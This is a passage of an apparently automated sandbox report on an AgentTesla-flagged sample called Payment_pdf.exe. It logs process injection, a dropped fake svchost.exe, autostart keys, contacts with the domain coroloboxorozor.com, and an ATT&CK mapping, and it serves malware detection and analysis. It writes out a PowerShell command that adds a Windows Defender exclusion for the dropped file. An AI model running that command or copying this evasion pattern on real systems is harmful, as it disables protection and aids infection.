                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe' -Force
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Users\user\Desktop\Payment_pdf.exeMemory written: C:\Users\user\Desktop\Payment_pdf.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeMemory written: unknown base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe' -Force
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess created: C:\Users\user\Desktop\Payment_pdf.exe C:\Users\user\Desktop\Payment_pdf.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6968 -ip 6968
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 2032
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe' -Force
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                  Source: explorer.exe, 00000011.00000002.619111598.0000000000C60000.00000002.00000001.sdmp, explorer.exe, 00000016.00000002.619929497.00000000018B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000011.00000002.619111598.0000000000C60000.00000002.00000001.sdmp, explorer.exe, 00000016.00000002.619929497.00000000018B0000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000011.00000002.619111598.0000000000C60000.00000002.00000001.sdmp, explorer.exe, 00000016.00000002.619929497.00000000018B0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
                  Source: explorer.exe, 00000011.00000002.619111598.0000000000C60000.00000002.00000001.sdmp, explorer.exe, 00000016.00000002.619929497.00000000018B0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\Payment_pdf.exeQueries volume information: C:\Users\user\Desktop\Payment_pdf.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Payment_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Users\user\Desktop\Payment_pdf.exeQueries volume information: C:\Users\user\Desktop\Payment_pdf.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Payment_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeQueries volume information: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe VolumeInformation
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeQueries volume information: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe VolumeInformation
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeQueries volume information: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeQueries volume information: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exe VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Users\user\Desktop\Payment_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 0000000C.00000002.594360112.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.423869749.0000000003AAE000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.453125199.00000000044AE000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0.2.Payment_pdf.exe.3aae1e0.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment_pdf.exe.3ae4200.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.Payment_pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment_pdf.exe.3ae4200.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment_pdf.exe.3aae1e0.5.raw.unpack, type: UNPACKEDPE

                  Remote Access Functionality:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 0000000C.00000002.594360112.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.423869749.0000000003AAE000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.453125199.00000000044AE000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0.2.Payment_pdf.exe.3aae1e0.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment_pdf.exe.3ae4200.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.Payment_pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment_pdf.exe.3ae4200.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment_pdf.exe.3aae1e0.5.raw.unpack, type: UNPACKEDPE

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation211Registry Run Keys / Startup Folder21Process Injection212Masquerading321OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder21Virtualization/Sandbox Evasion27LSASS MemorySecurity Software Discovery341Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerVirtualization/Sandbox Evasion27SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection212NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsTimestomp1DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery123Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 356522 Sample: Payment_pdf.cmd Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 59 coroloboxorozor.com 2->59 71 Multi AV Scanner detection for submitted file 2->71 73 Yara detected AgentTesla 2->73 75 Machine Learning detection for sample 2->75 77 5 other signatures 2->77 9 Payment_pdf.exe 17 6 2->9         started        14 explorer.exe 2->14         started        16 explorer.exe 2->16         started        18 10 other processes 2->18 signatures3 process4 dnsIp5 61 coroloboxorozor.com 172.67.172.17, 49712, 49734, 49747 CLOUDFLARENETUS United States 9->61 55 C:\Windows\Resources\Themes\...\svchost.exe, PE32 9->55 dropped 57 C:\Windows\...\svchost.exe:Zone.Identifier, ASCII 9->57 dropped 95 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 9->95 97 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 9->97 99 Creates multiple autostart registry keys 9->99 107 5 other signatures 9->107 20 Payment_pdf.exe 2 5 9->20         started        24 WerFault.exe 23 9 9->24         started        26 cmd.exe 1 9->26         started        28 powershell.exe 25 9->28         started        63 192.168.2.1 unknown unknown 14->63 30 svchost.exe 14->30         started        101 Drops executables to the windows directory (C:\Windows) and starts them 16->101 33 svchost.exe 16->33         started        65 127.0.0.1 unknown unknown 18->65 103 Multi AV Scanner detection for dropped file 18->103 105 Machine Learning detection for dropped file 18->105 35 WerFault.exe 18->35         started        file6 signatures7 process8 dnsIp9 49 C:\Users\user\AppData\Roaming\...\CZVkY.exe, PE32 20->49 dropped 51 C:\Users\user\...\CZVkY.exe:Zone.Identifier, ASCII 20->51 dropped 79 Moves itself to temp directory 20->79 81 Creates multiple autostart registry keys 20->81 83 Hides that the sample has been downloaded from the Internet (zone.identifier) 20->83 53 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 24->53 dropped 37 conhost.exe 26->37         started        39 timeout.exe 1 26->39         started        41 conhost.exe 28->41         started        67 coroloboxorozor.com 30->67 85 Multi AV Scanner detection for dropped file 30->85 87 Machine Learning detection for dropped file 30->87 89 Adds a directory exclusion to Windows Defender 30->89 93 2 other signatures 30->93 43 powershell.exe 30->43         started        45 cmd.exe 30->45         started        69 coroloboxorozor.com 33->69 91 System process connects to network (likely due to code injection or exploit) 33->91 file10 signatures11 process12 process13 47 conhost.exe 43->47         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Payment_pdf.exe26%VirustotalBrowse
                  Payment_pdf.exe21%ReversingLabsByteCode-MSIL.Downloader.Generic
                  Payment_pdf.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exe100%Joe Sandbox ML
                  C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exe21%ReversingLabsByteCode-MSIL.Downloader.Generic
